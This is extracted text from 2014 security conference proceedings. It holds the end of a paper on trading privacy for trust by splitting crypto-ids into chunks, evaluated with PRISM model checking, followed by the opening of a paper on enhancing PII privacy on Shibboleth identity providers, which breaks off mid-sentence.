information exposed by CB ′ includes that revealed by CB . If
two chunks are related through ≤ then they could be originated
from the same crypto-id. As we will see, maintaining the
poset structure provides the means to approximate the trust
towards any (possibly unknown) crypto-id by employing the
trust related to the potential constituting chunks.
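The refinement check of Definition 1 can be sketched as follows, representing a chunk as a (value, bitmask) pair of n-bit integers; this encoding is our assumption, not fixed by the paper:

```python
def refines(cb, cbp, n=8):
    """True iff chunk cbp refines chunk cb (cb <= cbp), per Definition 1.
    Each chunk is a (value, bitmask) pair of n-bit integers."""
    (v, m), (vp, mp) = cb, cbp
    for i in range(n):
        bit = 1 << i
        if (m & bit) and not (mp & bit):
            return False          # B[i] <= B'[i] violated
        if (m & bit) and (v & bit) != (vp & bit):
            return False          # exposed bits must coincide
    return True

# The finer chunk exposes a superset of bits with matching values:
print(refines((0b00010000, 0b00010010), (0b00010100, 0b00010110)))  # True
```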
[Figure 1. Example of a local trust structure: a poset over chunks C1: 00011000, C2: 00011000, C3: 00000100, C4: 00010000, C5: 00000000, C6: 00010000, C7: 00000000, with trust values C1: 45, C2: 30, C3: 35, C4: 15, C5: 25, C6: 10, C7: 5.]
Each element of the poset (C, ≤) is labeled by a value
of the trust domain T . Such a value represents the trust of
the user towards the related chunk resulting from interactions
associated with such a chunk. Formally, we denote such an
extended structure with (C, ≤, t), where t : C → T defines
the mapping from chunks to trust values. Initially, for every
unknown chunk C with which the user interacts for the first
time, we assume t(C) to be equal to the dispositional trust
dt of the user, which represents the attitude to cooperate with
unknown users.
Example: Figure 1, which in the following we use as
running example, shows the graphical representation of a poset,
where, e.g., C6 ≤ C4 ≤ C2 ≤ C1 , as well as C7 ≤ C5 ≤
C3 , while, e.g., C6 and C3 are not related with each other.
Moreover, the figure reports also the trust associated with each
known chunk at a given instant of time, by assuming the trust
domain [0, 50].
To emphasize the nature of the independent model of
privacy release, notice that even if Alice invested chunk C1
in a past interaction with Bob, whose reference trust structure
is that depicted in Figure 1, then in the current transaction
she may use chunk C2 only, while Bob cannot infer the link
between the user of the past interaction associated with C1
and the current one. As a side effect, notice also that all the
users with a crypto-id matching with C2 actually benefit from
the trust (or pay the mistrust) associated with C2 .
The obfuscation mechanism illustrated in the example above, which is crucial for the requirements of the independent model of privacy release, can be viewed as an additional incentive to take collaborative and honest decisions, as a high number of highly trusted crypto-id chunks increases the probability of obtaining services at a reasonable cost while preserving the desired level of privacy.
A fundamental issue for any trust system is given by the
transaction feedback that induces a trust variation influencing
the trust t(C) towards the chunk C associated with the transaction. In our setting, it is worth observing that such a feedback
should be weighted by the chunk size. More precisely, the user
can decide to apply a discounting factor to the feedback result
that is inversely proportional to the size of the chunk, in order
to reflect that the amount of sensitive information exposed is
proportional to the trustworthiness as perceived by the user.
Example: As a consequence of a positive transaction
conducted through chunk C2 and resulting in a trust variation
equal to, e.g., +5, we would obtain t(C2 ) = 32.5 if the
discounting factor is applied, and t(C2 ) = 35 otherwise.
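A minimal sketch of the size-weighted feedback follows. The concrete discount, here the fraction of crypto-id bits exposed by the chunk, is our illustrative assumption, since the paper leaves the exact factor to the user's policy:

```python
def discounted_feedback(trust, variation, exposed_bits, n=8):
    """Weight the trust variation by chunk size: the more bits a chunk
    exposes, the larger the share of the feedback it receives."""
    return trust + variation * (exposed_bits / n)

# A +5 feedback on a chunk exposing 4 of 8 bits adds only +2.5:
print(discounted_feedback(30, 5, 4))  # 32.5
```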
On the other hand, it is also worth deciding whether and
how the feedback related to chunk C has to be propagated
to other elements of the trust structure (C, ≤, t). Since propagation would result in ambiguity if applied to chunks of
the poset that cannot be related through ≤, let us examine
the remaining cases. Depending on the feedback, which can
be either positive or negative, and the propagation direction
(towards finer or coarser chunks, or else both), every possible
combination gives rise to a different propagation policy. For
instance, in order to advocate a conservative policy, variations
shall not be propagated to elements that refine C, because an
interaction disclosing a small amount of sensitive information
should not affect the trust level of chunks that expose more
information. This policy contrasts also potential attacks by
users preserving their identity and aiming at penalizing the
trust of small chunks shared by a large number of users.
On the other hand, in order to fully exploit the flexibility of
the independent model of privacy release, it would be worth
propagating the trust variation for C to every chunk C ′ in
the poset that is refined by C. In this case, the trust variation
for C ′ is discounted by a factor proportional to the difference
between the size of C and the size of C ′ . In practice, the larger
the difference between C and C ′ is, the slighter the impact of
the trust variation of C upon C ′ .
Example: Consider chunk C2 and the positive transaction
of the previous example determining t(C2 ) = 32.5. Then, by
virtue of the propagation policy discussed above we have, e.g.,
t(C4 ) = 16.25 and t(C1 ) = 45.
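The propagation policy can be sketched on a toy fragment of the trust structure of Figure 1. The chunk sizes and the halving of the variation per bit of size difference are illustrative assumptions, chosen only to be consistent with the numbers of the example:

```python
trust = {"C1": 45.0, "C2": 30.0, "C4": 15.0}     # chunk -> trust value
size = {"C1": 3, "C2": 2, "C4": 1}               # chunk -> exposed-bit count (assumed)
refined_by = {"C4": ["C2", "C1"], "C2": ["C1"]}  # coarser chunk -> finer chunks

def propagate(c, variation):
    """Apply an (already discounted) variation to chunk c and propagate a
    further-discounted share to every coarser chunk refined by c; chunks
    refining c are left untouched (conservative policy)."""
    trust[c] += variation
    for coarser, finer in refined_by.items():
        if c in finer:
            trust[coarser] += variation / 2 ** (size[c] - size[coarser])

propagate("C2", 2.5)
# t(C2) = 32.5, t(C4) = 16.25, t(C1) = 45 unchanged, as in the example
```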
As another important assumption, so far we assumed that
any new chunk C that is added to the poset is initially
associated with the dispositional trust of the user. Alternatively,
the trust structure (C, ≤, t) can be employed to infer some
trust information about C. Based on the same intuition behind
feedback propagation, the trust values associated with known
chunks that are in some relation with C can be combined. In
fact, we can interpret C as an approximation of such chunks,
which, however, must be pairwise unrelated by ≤ to avoid
redundancy when counting the related trust values.
By following the conservative policy previously discussed,
we initialize the trust towards C on the basis of the trust values
associated with chunks that refine C.
Definition 2 (Chunk coverage): Given a trust structure (C, ≤, t) and a chunk C ∉ C, a coverage for C is a set {C1, . . . , Cm} ⊆ C such that:
• Ci ≰ Cj for all 1 ≤ i, j ≤ m with i ≠ j;
• C ≤ Ci for all 1 ≤ i ≤ m.
The initial trust associated with C by the coverage {C1, . . . , Cm} is (1/m) · Σ_{i=1}^{m} t(Ci).
Since in the poset several different coverages may exist
for a chunk C, we can adopt different policies to select
one of them, e.g., by choosing the coverage inducing the
highest/lowest trust, or by keeping all of them and then
calculating the average trust.
Example: A coverage for chunk C8 : 00000000 is the set
{C4 , C5 }, which determines the initial trust value 20. Other
candidates are {C2 , C3 }, {C3 , C4 }, and {C1 }. The average
trust resulting from all the possible coverages is 30.625.
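The coverage computation of the example can be reproduced in a few lines; the coverages themselves are taken from the text rather than enumerated:

```python
def coverage_trust(coverage, t):
    """Initial trust induced by a coverage {C1, ..., Cm}: the mean of t(Ci)."""
    return sum(t[c] for c in coverage) / len(coverage)

t = {"C1": 45, "C2": 30, "C3": 35, "C4": 15, "C5": 25}
coverages = [("C4", "C5"), ("C2", "C3"), ("C3", "C4"), ("C1",)]

per_coverage = [coverage_trust(cov, t) for cov in coverages]
average = sum(per_coverage) / len(coverages)
# per_coverage = [20.0, 32.5, 25.0, 45.0]; average = 30.625, as in the example
```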
In general, from the effectiveness standpoint, the trust
structure (C, ≤, t) is used to manage locally information
(about chunk’s trust) allowing the user to approximate the
trust towards other users, without any knowledge about their
crypto-ids and actual behaviors. As far as efficiency issues are
concerned, in order to circumvent the problem of dealing with
a huge trust structure, it is possible to constrain the choice
of the bitmask, e.g., by fixing a priori a rule for splitting the
crypto-id into a limited set of chunks.
Finally, we emphasize that the presentation of the proposed design model abstracts away from the specific trust metric adopted. Indeed, our method may be integrated with any computational notion of trust and with any recommendation mechanism used in classical trust systems for distributed environments [21] [22].
III. FORMAL VERIFICATION
In this section, we evaluate the proposed independent
model of privacy release through a comparison with an abstraction of standard approaches in which information linking
is irrevocable, in the following called incremental model of
privacy release. To this aim, we employ the model checker
PRISM [23] [24] [5], through which it is possible to build
automatically probabilistic models – like discrete-time Markov
chains and Markov decision processes – from state-based
formal specifications. On the semantic models deriving from
formal descriptions, quantitative properties expressed in probabilistic extensions of temporal logics are verified through
model checking techniques.
The comparison is conducted by assuming that the two
models of privacy release are applied in the setting of a real-world cooperation system [6], in which users providing services, called requestees, and recipients of such services, called
requesters, are involved in a cooperation process balancing
trustworthiness of each participant with access to services and
related costs. In the following, we omit the specification of the
formal description given in the PRISM modeling language and
we briefly introduce the original trust model and its relation
with service remuneration [6]. Then, we describe our modeling
assumptions and the metrics that are used to evaluate how
trading privacy for trust influences access to services and
related costs. We finally discuss the obtained results.
A. Trust Model
Trust is a discrete metric with values ranging in the interval
[0, 50], such that null = 0, low = 10, med = 25, and high =
40. The trust Tij of user i towards any credential j (which can
be, e.g., a crypto-id chunk or an entity identity) is modeled
abstractly as follows:
Tij = α · trust ij + (1 − α) · recs ij
(1)
Parameter α ∈ [0, 1] is the risk factor balancing personal
experience with recommendations by third parties. The trust
metric trust ij is the result of previous direct interactions of
i with j. Initially, trust ij is set to the dispositional trust of
i, denoted by dt i . After each positive interaction, trust ij is
incremented by a factor v. Parameter recs ij is the average of
the trust metrics towards j recommended to i by other users.
For each service type, the service trust threshold st represents
the minimum trust required to negotiate the service.
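Equation (1) is a one-liner; the sample values below are arbitrary:

```python
def trust_towards(trust_ij, recs_ij, alpha):
    """Equation (1): the risk factor alpha balances direct experience
    (trust_ij) against third-party recommendations (recs_ij)."""
    return alpha * trust_ij + (1 - alpha) * recs_ij

# alpha = 0.5 weighs both sources equally:
print(trust_towards(40, 20, 0.5))  # 30.0
```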
B. Service Cost Model
The joint combination of trust and remuneration is implemented by making the service cost function dependent on the trust T of the requestee towards the requester credential. The other main parameters are: Cmin, the minimum cost asked by the requestee regardless of trust; Cmax, the maximum cost asked to serve untrusted requests; and the threshold values T′ and T′′, with T′′ < T′.
The cost function proposed in [6] expresses a linear dependence between trust and cost:

C(T) = Cmin + ((Cmax − Cmin)/T′) · (T′ − T)   if T < T′
C(T) = Cmin                                   otherwise      (2)

In order to examine the trust/cost tradeoff thoroughly, we consider two more functions approximating the linearity of the relation between trust and cost. A simple one-step function is:

C(T) = Cmax   if T < T′
C(T) = Cmin   otherwise      (3)

while a possible two-step function is:

C(T) = Cmax     if T < T′′
C(T) = Cmax/2   if T′′ ≤ T < T′
C(T) = Cmin     otherwise      (4)
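The three cost functions can be sketched as follows, using the parameter values of the experiments below (Cmin = 0, Cmax = 10, T′ = high = 40, T′′ = med = 25):

```python
def cost_linear(T, c_min=0, c_max=10, t1=40):
    """Equation (2): cost decreases linearly with trust below T'."""
    return c_min + (c_max - c_min) / t1 * (t1 - T) if T < t1 else c_min

def cost_one_step(T, c_min=0, c_max=10, t1=40):
    """Equation (3): full price below T', minimum price above."""
    return c_max if T < t1 else c_min

def cost_two_step(T, c_min=0, c_max=10, t1=40, t2=25):
    """Equation (4): full price below T'', half price in [T'', T')."""
    if T < t2:
        return c_max
    return c_max / 2 if T < t1 else c_min

# A requester with trust med = 25 pays:
print(cost_linear(25), cost_one_step(25), cost_two_step(25))  # 3.75 10 5.0
```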
C. Modeling Assumptions
Our objective is to compare the model of incremental
release of privacy (represented in the figures by the curves
named inc) with the model of independent release of privacy
(represented in the figures by the curves named ind ). For the
sake of uniformity, for both models we assume abstractly that
privacy is released (through the pseudonyms mechanism [14]
and through the chunk mechanism, respectively) as a percentage of the total amount of sensitive information that the
user may disclose. Similarly, in every trust-based formula we
consider percentages of the trust involved.
The experiments are conducted by model checking several
configurations of the system against formulas expressed in
quantitative extensions of Computation Tree Logic [5]. For
instance, Figure 2 refers to one requester interacting with one
requestee with the aim of obtaining 10 services that can be
of three different types. The figure reports the results for the
best strategy, if one exists, allowing the requester to get access
to all the services requested by minimizing the total expected
cost (reported on the vertical axis) depending on the amount
of revealed sensitive information (reported on the horizontal
axis). The choice of the amount of privacy to spend for each
request is under the control of the requester. The choice of
the service type is either governed by the requester, or it is
probabilistic with uniform distribution (see the curves denoted
by prob in the figure). Requestee’s parameters are dt = med
and v = 5, as we assume that each transaction induces a
positive feedback. The three service types are characterized by trust threshold st1 = null with cost function (2), st2 = low with (3), and st3 = med with (4), respectively. The service cost parameters are Cmin = 0, Cmax = 10, T′ = high, and T′′ = med.
[Figure 2. Trading cost for privacy.]
We complete the comparison with an experiment assuming
one requester and two requestees, which are chosen nondeterministically by the requester. The number of issued requests
is 10, while we consider only the first type of service. The
analysis, reported in Figure 3, presents the results obtained by changing the service cost function. Requestee's trust parameters are as follows: dt = med, st = null, α = 0.5.
D. Discussion
We now comment on the obtained results, by first considering Figure 2, which reveals two interesting behaviors.
Firstly, if the choice of the service is under the control of
the requester, then the difference between the two models is
significant only for values of the privacy release higher than
70%. In order to interpret this result, we checked the best
requester’s strategy, which consists of choosing always the
service offering the best ratio trust/cost, i.e., the one using (2).
Whenever trust is high enough to apply the minimum cost, then
it turns out to be convenient to select also the other two service
types. According to this strategy, if the privacy disclosure is
below 70% it happens that trust does not reach the threshold
T ′ . Therefore, as a consequence of (2), the relation between
trust and cost is always linear and the two privacy models
turn out to be equivalent from the economic standpoint. On
the other hand, if the requester is highly trustworthy, then
the cost to pay becomes constantly equal to the minimum
cost, meaning that the requester could invest less privacy to
obtain the same cost, thus revealing the advantages of the
independent model. In practice, independently of the privacy
model, it is economically convenient for the requester to
disclose the information needed to obtain rapidly the best cost.
Instead, for high levels of trust, it would be convenient for
requester’s privacy to reduce as much as possible the amount
of disclosed information. Whenever identity of the requester
is always fully disclosed, then the two models experience the
same performance.
Secondly, if the choice of the service is probabilistic, thus modeling, e.g., a situation in which the requester may require every type of service independently of its cost, then it is not possible to satisfy all the requests if a minimum disclosure of privacy is not guaranteed. However, such a minimum value is considerably higher for the incremental model, in which case at least an average privacy release of 92% is needed. Hence, if the requester is somehow forced to require certain services, then the independent model performs better.
The role of the service cost function is emphasized by the curves of Figure 3, which show that whenever a step function is used, the independent model is able to better exploit the intervals of trust in which the service cost is constant.
[Figure 3. Trading cost for privacy by varying the cost function: (a) Equation (2); (b) Equation (3); (c) Equation (4).]
In the previous experiments, priority is given to cost and
to the average disclosure of privacy needed to optimize such
a cost. However, if cost is not a fundamental issue, then
the tradeoff of interest concerns trust and privacy. In order
to analyze such a tradeoff, we reformulate the experiment
of Figure 2 by focusing on the optimization of the average
percentage of privacy release needed to obtain 10 services
of a given type. In particular, we consider the second and
third service types, for which the service trust threshold is
low and med, respectively. Since to obtain such services the
requester must be trusted by the requestee, we examine the
tradeoff between such a trust and requester’s privacy. For
the second (resp., third) service type, the average percentage
of privacy release is 38% (resp., 92%) when applying the
incremental model, while it is equal to 28% (resp., 64%) in
the case of the independent model. Therefore, the observed
values show that through the independent model we obtain
all the required services by disclosing much less privacy
than through the incremental model. The related difference
is directly proportional to the trust threshold needed to obtain
the services.
IV. CONCLUSION
The attitude to cooperation is strongly affected by the
tradeoff existing among privacy and trustworthiness of the
involved parties and cost of the exchanged services. In order to balance the related incentive mechanisms, it is worth
considering the constraints of the model of privacy release.
Thanks to a mechanism based on the splitting of crypto-ids, it
is possible to manage the disclosure of sensitive information
in a less restrictive way with respect to classical models, even
in distributed environments.
The formal evaluation has emphasized that the flexibility
of the independent model ensures better performance with
respect to the incremental model. This is always true if the
main objective is trading privacy for trust. If services must be
paid and cost depends on trust, then the adopted cost function
affects the tradeoff among privacy, trust, and cost, by revealing
the advantages of the independent model in the intervals of
trust values in which cost is constant.
As work in progress, the integration of the proposed distributed trust system with the centralized reputation system of [4] is under development. Moreover, a successful deployment of the proposed model depends strictly on the choice of the trust policies and configuration parameters discussed in Section II, which are currently subject to sensitivity analysis through formal verification.
References

[1] A. Aldini and A. Bogliolo, Eds., User-Centric Networking – Future Perspectives, ser. Lecture Notes in Social Networks. Springer, 2014.
[2] A. Jøsang, “Trust and reputation systems,” in Foundations of Security Analysis and Design IV (FOSAD’07), ser. LNCS, A. Aldini and R. Gorrieri, Eds. Springer, 2007, vol. 4677, pp. 209–245.
[3] S. Greengard, “Social games, virtual goods,” Communications of the ACM, vol. 54, no. 4, 2011, pp. 19–22.
[4] A. Aldini, A. Bogliolo, C. Ballester, and J.-M. Seigneur, “On the tradeoff among trust, privacy, and cost in incentive-based networks,” in 8th IFIP WG 11.11 Int. Conf. on Trust Management, ser. IFIP AICT, J. Zhou et al., Eds., vol. 430. Springer, 2014, pp. 205–212.
[5] V. Forejt, M. Kwiatkowska, G. Norman, and D. Parker, “Automated verification techniques for probabilistic systems,” in Formal Methods for Eternal Networked Software Systems, ser. LNCS, M. Bernardo and V. Issarny, Eds. Springer, 2011, vol. 6659, pp. 53–113.
[6] A. Bogliolo et al., “Virtual currency and reputation-based cooperation incentives in user-centric networks,” in 8th Int. Wireless Communications and Mobile Computing Conf. (IWCMC’12). IEEE, 2012, pp. 895–900.
[7] Y. Zhang, L. Lin, and J. Huai, “Balancing trust and incentive in peer-to-peer collaborative system,” Journal of Network Security, vol. 5, 2007, pp. 73–81.
[8] M. Yildiz, M.-A. Khan, F. Sivrikaya, and S. Albayrak, “Cooperation incentives based load balancing in UCN: a probabilistic approach,” in Global Communications Conf. (GLOBECOM’12). IEEE, 2012, pp. 2746–2752.
[9] Z. Li and H. Shen, “Game-theoretic analysis of cooperation incentives strategies in mobile ad hoc networks,” IEEE Transactions on Mobile Computing, vol. 11, no. 8, 2012, pp. 1287–1303.
[10] A. Aldini and A. Bogliolo, “Model checking of trust-based user-centric cooperative networks,” in 4th Int. Conf. on Advances in Future Internet (AFIN 2012). IARIA, 2012, pp. 32–41.
[11] A. Aldini, “Formal approach to design and automatic verification of cooperation-based networks,” Journal On Advances in Internet Technology, vol. 6, 2013, pp. 42–56.
[12] M. Kwiatkowska, D. Parker, and A. Simaitis, “Strategic analysis of trust models for user-centric networks,” in Int. Workshop on Strategic Reasoning (SR’13), vol. 112. EPTCS, 2013, pp. 53–60.
[13] A. Aldini and A. Bogliolo, “Modeling and verification of cooperation incentive mechanisms in user-centric wireless communications,” in Security, Privacy, Trust, and Resource Management in Mobile and Wireless Communications, D. Rawat, B. Bista, and G. Yan, Eds. IGI Global, 2014, pp. 432–461.
[14] J.-M. Seigneur and C.-D. Jensen, “Trading privacy for trust,” in 2nd Int. Conf. on Trust Management (iTrust’04), ser. LNCS, vol. 2995. Springer, 2004, pp. 93–107.
[15] M. Raya, R. Shokri, and J.-P. Hubaux, “On the tradeoff between trust and privacy in wireless ad hoc networks,” in 3rd ACM Conf. on Wireless Network Security (WiSec’10), 2010, pp. 75–80.
[16] L. Lilien and B. Bhargava, “Privacy and trust in online interactions,” in Online Consumer Protection: Theories of Human Relativism. IGI Global, 2009, pp. 85–122.
[17] W. Wagealla, M. Carbone, C. English, S. Terzis, and P. Nixon, “A formal model of trust lifecycle management,” in Workshop on Formal Aspects of Security and Trust (FAST’03), 2003.
[18] S. Köpsell and S. Steinbrecher, “Modeling unlinkability,” in 3rd Workshop on Privacy Enhancing Technologies, ser. LNCS, vol. 2760. Springer, 2003, pp. 32–47.
[19] I. Goldberg, “A pseudonymous communications infrastructure for the internet,” Ph.D. dissertation, University of California at Berkeley, 2000.
[20] A. Kobsa and J. Schreck, “Privacy through pseudonymity in user-adaptive systems,” ACM Transactions on Internet Technology, vol. 3, no. 2, 2003, pp. 149–183.
[21] S.-D. Kamvar, M.-T. Schlosser, and H. Garcia-Molina, “The EigenTrust algorithm for reputation management in P2P networks,” in 12th Conf. on World Wide Web (WWW’03). ACM, 2003, pp. 640–651.
[22] R. Zhou and K. Hwang, “PowerTrust: a robust and scalable reputation system for trusted peer-to-peer computing,” IEEE Transactions on Parallel and Distributed Systems, vol. 18, no. 4, 2007, pp. 460–473.
[23] T. Chen, V. Forejt, M. Kwiatkowska, D. Parker, and A. Simaitis, “PRISM-games: a model checker for stochastic multi-player games,” in 19th Int. Conf. on Tools and Algorithms for the Construction and Analysis of Systems (TACAS’13), ser. LNCS, vol. 7795. Springer, 2013, pp. 185–191.
[24] M. Kwiatkowska, G. Norman, and D. Parker, “PRISM 4.0: verification of probabilistic real-time systems,” in 23rd Int. Conf. on Computer Aided Verification (CAV’11), ser. LNCS, vol. 6806. Springer, 2011, pp. 585–591.

Copyright (c) IARIA, 2014. ISBN: 978-1-61208-376-6
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Enhancing Privacy on Identity Providers
Rafael Weingärtner
Carla Merkle Westphall
Department of Informatics and Statistics
Networks and Management Laboratory
Federal University of Santa Catarina
Florianópolis, Brazil
Email: {weingartner, carla}@lrg.ufsc.br
Abstract—Cloud computing is widely used to provide on-demand
services as a consequence of its benefits, such as reduced costs,
structural flexibility and agility in resource provisioning. However,
there are still people who are not comfortable with the idea of
sending their sensitive data to the cloud, such as the personally
identifiable information (PII) that could be used to identify
someone in the real world. Moreover, there have been cases of
data leaks, which resulted in huge losses both for companies
and their clients. Therefore, this article addresses the security and
privacy aspects of identity management. We present a model that
tackles privacy issues within the PII that is stored on identity
providers (IdPs). Thus, our proposal supports users and improves
their awareness when disseminating PIIs.
Keywords–Cloud Computing; Security; Privacy; Federation;
Identity providers.
I. Introduction
Cloud computing has been largely adopted to provide services to industry. As presented in [1] and [2], reduced
costs, flexibility and agility are the main reasons for the
widespread success of cloud computing. However, there are
people who are not comfortable sending their sensitive data to
the cloud [3]. Moreover, the Cloud Industry Forum points out
in [2] that when the cloud is under discussion, the biggest
debates are not about the technology per se, but rather
about the commercial and governance issues related to data
security and privacy.
Users have the right to be skeptical about the privacy and
security aspects of that model. Indeed, there have been recent
cases of data breaches and leaks, as noticed in [4] [5] [6],
which resulted in identity data leaks. Therefore, as pointed
out by Betgé-Brezetz, Kamga, Dupont and Guesmi in [7], cloud
service providers should focus on protecting sensitive data rather
than on tightening security perimeters, since the biggest threat
may be internal.
Sánchez, Almenares, Arias, Díaz-Sánchez and Marín in
[8] and De Capitani di Vimercati, Foresti and Samarati in [9]
discussed that as soon as users’ data is on identity providers
(IdPs), control over how that data is disclosed, stored and used
is lost. Moreover, data stored in the cloud may be sensitive and,
if linked with its owner’s identity, may violate his/her privacy.
This paper addresses some security and privacy aspects of
identity providers. On one side, we tackle the lack of control
that users have over their identification data (PII) that is stored
on identity providers. On the other side, we propose an
enhancement of the dissemination process to support users with
their PII disclosure, in a way that lowers the risk
of unaware or unintentional data dissemination.
The rest of this paper is structured as follows. Section II
gives a brief overview of the concepts that are used
throughout this paper. Section III presents and discusses
related work. Section IV describes the issue to
be addressed and presents our proposals. Section V closes the
paper with conclusions and future work.
II. Background
In order to provide a better understanding of the issue
being addressed and of the proposed model, this section
presents a brief overview of each concept that will be used
throughout the rest of this paper.
A. Privacy
Landwehr et al. in [10] define privacy as the control that
users have over the release of their personal data. Furthermore,
privacy is a fundamental human right, as pointed out by the
United Nations (UN) in its Universal Declaration of Human
Rights [11]. In addition, the Human Rights Council reinforced
that the same rights that people have offline must also be
protected online [12].
Therefore, privacy is a vital characteristic that has to be
considered in every system. Identity provider systems should
not be an exception and should have privacy added into their design.
In addition, Diaz and Gürses presented in [13] three
different paradigms of privacy:
•   Privacy as control – privacy violations are often associated with disclosure of data to third parties. In this
    context, privacy technologies provide individuals with
    means to control the disclosure of their information,
    and organizations with means to define and enforce
    data security policies to prevent abuse of personal
    information for unauthorized purposes. Thus, the main
    goal of this paradigm is to provide users with control
    and oversight over collection, processing and use of
    their data;
•   Privacy as confidentiality – the previous paradigm
    relies on the assumption that organizations that collect
    and process users’ data are completely honest. However, once data is under the control of an organization,
    it is hard for individuals to verify how their data is
    being used. This paradigm aims to prevent information
    disclosure, focusing on minimizing the information
    disclosed in a way that cannot be linked to users’
    identity;
•   Privacy as practice – this paradigm views privacy in
    a social dimension, as users often make privacy decisions
    based on how their social groups make those
    decisions. In this context, technologies strive to make
    information flow more transparent through feedback
    and awareness, enabling a better individual and collective understanding of how information is collected,
    analyzed and used.
Moreover, there are several pieces of legislation that aim to
protect users’ privacy on the Internet and in communication
systems. In Europe, there is the Data Protection Directive [14];
in the USA, there are the Health Insurance Portability and
Accountability Act (HIPAA) [15], the Gramm-Leach-Bliley
Act [16] and the Children’s Online Privacy Protection Rule
[17]; and in Brazil, the Internet Bill of Rights [18] was recently
approved. All of the aforementioned acts aim to protect users
against unwilling data disclosure and processing.
B. Identity management
Identity management can be defined as the process of
managing users’ identity attributes [19]. Moreover, Hansen,
Schwartz and Cooper in [20] stated that identity management
systems are programs or frameworks that administer the collection, authentication, and use of identity and of information linked
to identity. Thus, identity management provides means to create,
manage and use identity attributes.
Bertino and Takahashi in [21] presented the roles that exist
in an identity management system:
•   Users – entities that want to access some kind of
    service or resource;
•   Identity – a set of attributes that can be used to
    represent a user; it is also called personally identifiable
    information (PII);
•   Identity provider (IdP) – provides means to manage
    users’ attributes and delivers users’ PIIs to service
    providers;
•   Service provider (SP) – delivers the resource/service
    desired by a user. It delegates the authentication
    process to IdPs and is usually responsible for the
    authorization process.
Therefore, identity management systems are the frameworks that enable users to properly manage their PIIs.
Thus, they enable users to access resources and services using
identification data that is stored in identity providers, from
which a subset of the identification attributes may be disclosed
to service providers.
In this context we also have the concept of federation,
which is defined by Chadwick in [19] as an association of service providers and identity providers. Furthermore, Orawiwattanakul, Yamaji, Nakamura, Kataoka and Sonehara in [22] said
that a federation allows users to access resources in multiple
administrative domains (ADs) by initially authenticating with
their home AD instead of authenticating with the accessed one.
Therefore, identity federation is a set of standards and
technologies that enable the exchange of identities in a secure
way between different administrative domains.
Shibboleth [23] is one of the tools that can be used to create
a federation; it uses the Security Assertion Markup Language
(SAML) to exchange data between IdPs and SPs. On the one hand,
it has an IdP module that is developed in Java and can cope
with distinct data repositories, such as databases, the Lightweight
Directory Access Protocol (LDAP) and the Central Authentication
Service (CAS). On the other hand, its SP module is developed
in C as a module for the Apache Web Server, and it is used to
manage the access control of a protected resource.
Shibboleth [23] has a plug-in called uApprove.jp, presented
in [22], which provides users with some means to
manage PII disclosure and some feedback about the reasons
for the data collection. Figure 1 presents the workflow of
Shibboleth with its uApprove.jp plug-in. Each step is described as
follows:
Figure 1. Shibboleth + uApprove.jp workflow
1)  Unauthenticated users access a protected resource by
    means of a browser;
2)  The service provider sends users to the discovery
    service (DS), in which they have to choose an IdP
    that has their attributes;
3)  Users submit to the DS the IdP they are enrolled with.
    The DS starts the session initiator at the protected
    resource and sends users to the selected IdP;
4)  The IdP answers the request and presents users with a
    login page in which they have to enter their credentials;
5)  Users present their credentials, which are checked against
    the IdP database. If the authentication process succeeds,
    the IdP presents users with the SP’s terms
    of usage (ToU), which users should read and accept;
6)  After the ToU acceptance, users are presented with
    the attribute release page of uApprove.jp, which
    displays the user’s attributes, from which the user can
    select/unselect the optional ones at his/her will;
7)  The IdP creates an assertion with the result of the
    authentication and the user’s attributes that were chosen
    by the user to be disclosed, which is sent to the SP
    through the user’s browser;
8)  With the authentication confirmation and some PII
    data, the SP can decide about the resource delivery.
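The eight steps above can be condensed into a toy, in-process sketch. All objects and names below are hypothetical stand-ins, not the real Shibboleth API; an actual deployment exchanges SAML assertions between SP, discovery service and IdP through browser redirects.

```javascript
// Minimal simulation of the Shibboleth + uApprove.jp flow.
const idp = {
  users: { bob: { password: "s3cret", attributes: { name: "Bob", email: "bob@example.org" } } },
  // Steps 4-6: check credentials, then release only the attributes the
  // user left selected on the uApprove.jp attribute release page.
  authenticate(login, password, selectedAttributes) {
    const user = this.users[login];
    if (!user || user.password !== password) return null;
    const released = {};
    for (const attr of selectedAttributes) released[attr] = user.attributes[attr];
    return { authenticated: true, attributes: released }; // step 7: the "assertion"
  },
};

const sp = {
  // Steps 1-2: an unauthenticated request is redirected to the discovery service.
  requestResource() { return { redirect: "discovery-service" }; },
  // Step 8: decide on resource delivery based on the assertion.
  deliver(assertion) { return assertion && assertion.authenticated ? "resource" : "denied"; },
};

// Step 3 happens out of band: the user picks an IdP at the DS.
sp.requestResource();
const assertion = idp.authenticate("bob", "s3cret", ["name"]); // email stays undisclosed
console.log(sp.deliver(assertion)); // "resource"
```

Note how the email attribute never reaches the SP: only what the user selected at step 6 ends up in the assertion.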
There are other tools that can be used to create federations,
such as OpenAM and OpenId Connect. This paper uses Shibboleth because of its widespread adoption in academia and because
it is developed and maintained by Internet2 as
a free, open-source framework to build federations.
III. Related work
Switch in [24] developed a plugin for Shibboleth IdPs that
provides awareness of data disclosure when some
resource/service is accessed. However, users cannot select which data is
going to be disclosed; the user has either to agree or disagree
with the PII dissemination.
Orawiwattanakul, Yamaji, Nakamura, Kataoka and Sonehara in [22] tackled the lack of control over PII disclosure
in cloud federations. They proposed an extension of [24] that
enables users to select, among all non-mandatory attributes, which ones they wish to disclose to the SP
being accessed. This way, it guarantees that data disclosure
happens with user consent.
In a different approach to dealing with privacy in the cloud,
Sánchez, Almenares, Arias, Díaz-Sánchez and Marín in [8]
proposed a reputation protocol that weights the reputation of
entities in a federation in order to support data disclosure. This
way, users can check an SP’s reputation within the federation
before sending any data to it. A way is also provided for
users to check what is being done
with their data and, based on that, to lower or raise
the provider’s reputation.
Betgé-Brezetz, Kamga, Guy-Bertrand, Mahmoud and
Dupont in [25] addressed the cloud privacy and security issues
that arise when users send data to cloud providers without any
guarantee that it is going to be secured in a proper way. As
Sánchez, Almenares, Arias, Díaz-Sánchez and Marín did in
[8], they proposed a way to define whether or not a user trusts a cloud
provider, and the level of that trust. Based on how much the user
trusts the cloud provider, he/she could send data to the cloud in plain text,
partially encrypted (encrypted with some metadata in plain
text) or fully encrypted. A package called PDE (Privacy Data
Envelope) was also proposed to carry users’
data to the cloud. That package could hold the data (encrypted
or not) together with policies that state how, where, by whom and
when that data can be used.
Works [8] and [25] suffer from the same problem: a good
reputation does not mean that an SP is not vulnerable
to attacks, nor that it is taking all the required measures to
guarantee users’ privacy.
As an alternative to the previously presented works, Chadwick
and Fatema in [26] addressed the lack of means to create
